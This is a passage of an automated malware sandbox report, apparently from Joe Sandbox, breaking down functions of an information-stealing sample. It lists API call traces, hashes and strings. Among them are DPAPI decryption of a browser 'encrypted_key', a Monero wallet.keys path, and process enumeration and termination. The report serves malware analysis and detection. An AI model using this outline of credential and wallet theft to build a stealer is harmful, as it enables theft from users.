                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          • Opcode ID: 4bba331a8c684b53e99da06488db210b177610eed4d534f638df2eb1ff889f07
                          • Instruction ID: 75fadfa9bbe1a13f00be8be93310dd420cd502d0e2d78327b174cf7d9d5c39d2
                          • Opcode Fuzzy Hash: 4bba331a8c684b53e99da06488db210b177610eed4d534f638df2eb1ff889f07
                          • Instruction Fuzzy Hash: 99512275D105189BDB44FBE0EC92DED737AAF54300F40852CF81667192EE746A09CFAA
                          Function 00623560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 145433856a79468b98dc1f9ec6e89d5a765aa5f1c31f25ade3a9410cd80916ef
                          • Instruction ID: 4b1988994deda2fb66fa4a6ad5631ca8d393a917746e7a7e532a956135447c65
                          • Opcode Fuzzy Hash: 145433856a79468b98dc1f9ec6e89d5a765aa5f1c31f25ade3a9410cd80916ef
                          • Instruction Fuzzy Hash: 0E416275D10619AFDB04EFE4E855AEEB77ABF44304F00841CE41576390DB78AA09CF96
                          Function 00619CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 006199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006199EC
                            • Part of subcall function 006199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00619A11
                            • Part of subcall function 006199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00619A31
                            • Part of subcall function 006199C0: ReadFile.KERNEL32(000000FF,?,00000000,0061148F,00000000), ref: 00619A5A
                            • Part of subcall function 006199C0: LocalFree.KERNEL32(0061148F), ref: 00619A90
                            • Part of subcall function 006199C0: CloseHandle.KERNEL32(000000FF), ref: 00619A9A
                            • Part of subcall function 00628E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00628E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00619D39
                            • Part of subcall function 00619AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Na,00000000,00000000), ref: 00619AEF
                            • Part of subcall function 00619AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00614EEE,00000000,?), ref: 00619B01
                            • Part of subcall function 00619AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Na,00000000,00000000), ref: 00619B2A
                            • Part of subcall function 00619AC0: LocalFree.KERNEL32(?,?,?,?,00614EEE,00000000,?), ref: 00619B3F
                            • Part of subcall function 00619B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00619B84
                            • Part of subcall function 00619B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00619BA3
                            • Part of subcall function 00619B60: LocalFree.KERNEL32(?), ref: 00619BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: 27fc338cb701f0d5a4abab409a92dabc95975a13a2115cbe21aec90d2f992a30
                          • Instruction ID: 1c35bdcada64fd7ea1b032aa3623e596c5dbbc69f6c318172cdce1773c9f9c04
                          • Opcode Fuzzy Hash: 27fc338cb701f0d5a4abab409a92dabc95975a13a2115cbe21aec90d2f992a30
                          • Instruction Fuzzy Hash: 5F3110B5D10209AFCB04DBE4DC95AEFB7BAAF48304F184519E905A7241EB349A44CBA5
                          Function 006294D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 006294EB
                            • Part of subcall function 00628D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0062951E,00000000), ref: 00628D5B
                            • Part of subcall function 00628D50: RtlAllocateHeap.NTDLL(00000000), ref: 00628D62
                            • Part of subcall function 00628D50: wsprintfW.USER32 ref: 00628D78
                          • OpenProcess.KERNEL32(00001001,00000000,?), ref: 006295AB
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 006295C9
                          • CloseHandle.KERNEL32(00000000), ref: 006295D6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                          • String ID:
                          • API String ID: 3729781310-0
                          • Opcode ID: cfa1d92b587163627403cf8ec64f93f625a3d02f2a80e1d108dd698406f19f12
                          • Instruction ID: 52ab1e3828a0ec6521f036753cde8f952add4a37f981ea60b2326ffd79ff2681
                          • Opcode Fuzzy Hash: cfa1d92b587163627403cf8ec64f93f625a3d02f2a80e1d108dd698406f19f12
                          • Instruction Fuzzy Hash: 46313B71A003189FDB14DBD0DD89BEDB7B9FF48301F104559E506AB284DB78AA89CF51
                          Function 00628680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006305B7), ref: 006286CA
                          • Process32First.KERNEL32(?,00000128), ref: 006286DE
                          • Process32Next.KERNEL32(?,00000128), ref: 006286F3
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          • CloseHandle.KERNEL32(?), ref: 00628761
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 60ff76d51dcbe2f6d9d6cbb0b07ab0a7873768ce4fc237b5ad5f3dc0cd78cc0b
                          • Instruction ID: ac3017a705fb795d3e04005f07cc38d08b98d3ddf436f90eea0517325f579837
                          • Opcode Fuzzy Hash: 60ff76d51dcbe2f6d9d6cbb0b07ab0a7873768ce4fc237b5ad5f3dc0cd78cc0b
                          • Instruction Fuzzy Hash: 93316F71901628ABCB64DF90EC81FEEB779FF48700F10429DE50AA2190DB746A45CFA2
                          Function 00627980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00630E00,00000000,?), ref: 006279B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 006279B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00630E00,00000000,?), ref: 006279C4
                          • wsprintfA.USER32 ref: 006279F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: b50e750bc0748803387a690e81ee5973c59de8881b49559edcc0aa6d3eb7871f
                          • Instruction ID: 8a672f260fe812559f0b816d721fb704966c8a35dc5bec26413b6c01518bcb69
                          • Opcode Fuzzy Hash: b50e750bc0748803387a690e81ee5973c59de8881b49559edcc0aa6d3eb7871f
                          • Instruction Fuzzy Hash: E9112AB2904218ABCB14DFC9DD85BBEB7F8FB4CB12F10421AF605A2280D23D5940CBB1
                          Function 0062C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 0062C74E
                            • Part of subcall function 0062BF9F: __amsg_exit.LIBCMT ref: 0062BFAF
                          • __getptd.LIBCMT ref: 0062C765
                          • __amsg_exit.LIBCMT ref: 0062C773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0062C797
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 1240a9ce71714f860901d1662d7fa5348c00783ff8516018ec4db21f9e962c11
                          • Instruction ID: 52713b9fd15224be72f799228553e0b101db82d8534a0bdffd6c0636b41a96b7
                          • Opcode Fuzzy Hash: 1240a9ce71714f860901d1662d7fa5348c00783ff8516018ec4db21f9e962c11
                          • Instruction Fuzzy Hash: DBF09032900E309BD7A1BFB87806B9D33A3AF00730F21514DF505A62D2CB645941EE9E
                          Function 00624F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00628DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00628E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00624F7A
                          • lstrcat.KERNEL32(?,00631070), ref: 00624F97
                          • lstrcat.KERNEL32(?,01119278), ref: 00624FAB
                          • lstrcat.KERNEL32(?,00631074), ref: 00624FBD
                            • Part of subcall function 00624910: wsprintfA.USER32 ref: 0062492C
                            • Part of subcall function 00624910: FindFirstFileA.KERNEL32(?,?), ref: 00624943
                            • Part of subcall function 00624910: StrCmpCA.SHLWAPI(?,00630FDC), ref: 00624971
                            • Part of subcall function 00624910: StrCmpCA.SHLWAPI(?,00630FE0), ref: 00624987
                            • Part of subcall function 00624910: FindNextFileA.KERNEL32(000000FF,?), ref: 00624B7D
                            • Part of subcall function 00624910: FindClose.KERNEL32(000000FF), ref: 00624B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: 8c6ed26ad45f5fb27a400f380ca73c92f75ad990ec395c67c99dbcba4f0aa8bc
                          • Instruction ID: e147056aebf190b86dfbcc911a5f8af5ce331fac71f23d1d3bc91c67e4cb45bd
                          • Opcode Fuzzy Hash: 8c6ed26ad45f5fb27a400f380ca73c92f75ad990ec395c67c99dbcba4f0aa8bc
                          • Instruction Fuzzy Hash: D821CBB69003186BC798F7B0EC86EED333EBB54301F004658B64997181EE7596CC8F96